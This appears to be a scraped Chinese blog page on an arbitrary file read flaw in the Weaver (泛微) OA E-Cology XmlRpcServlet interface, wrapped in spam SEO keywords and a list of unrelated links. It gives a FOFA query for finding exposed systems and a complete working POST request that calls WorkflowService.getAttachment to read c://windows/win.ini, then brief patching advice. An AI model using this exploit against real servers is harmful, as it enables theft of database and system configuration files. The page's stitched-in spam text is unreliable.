当前位置: 首页 > news >正文

免费建站网站黄金网站游戏网站模板下载

免费建站网站黄金网站,游戏网站模板下载,北京网站建设公司优势,推荐一本学做网站的书漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.yayakq.cn/news/276776/

相关文章:

  • wordpress建设网站的方法大型网站建设哪家快
  • 免费做国际贸易的网站做公益选哪个网站好
  • 百度站长工具app腾讯微信公众号
  • 强比网站建设wordpress首页文章轮播
  • wap网站开发企业推广费用占比多少合适
  • 2021年建站赚钱广州平面设计
  • 网站ip地址查询物流网站前端模板下载
  • 苏州市建设厅网站做淘宝网站如何提取中间的提成
  • 奎屯网站制作靓号网建站
  • 苏州做网站的企业企业网站推广是不是必要的
  • 有多少个购物网站核酸检测赚了七十亿
  • 网站诊断方案wordpress登入不进去
  • 济南网站优化推广方案国外设计师wordpress主题
  • 做网站的图哪来网页版梦幻西游水晶宫攻略
  • 万网企业网站建设青岛哪家做网站的公司好
  • 厦门杏林建设企业网站dede cms 网站模板
  • 电影网站做seo原子艺术做的网站怎么样子
  • 东莞注塑切水口东莞网站建设c mvc制作网站开发
  • 做外贸兼职的网站有哪些广西住房与建设厅网站
  • 珠宝 网站欣赏wordpress 分页 未找到页面
  • 北京手机网站开发希腊网站后缀
  • 个体经营可以建设网站吗在线设计平台怎么运营
  • 深圳网站制作公司地址网站推广多少钱一年
  • 建站平台绑定域名个人做购物商城网站会罚款吗
  • 淘宝接单做网站做网站如何上传
  • 济南网站优化公司排名沈阳关键词优化电话
  • wordpress 众筹网站wordpress个人免签支付
  • 广州做网站价位专业设计网址青岛网站开发
  • 广西网站建设网址外贸网站推广营销
  • 深圳网站设计 商城seo排名优化推广报价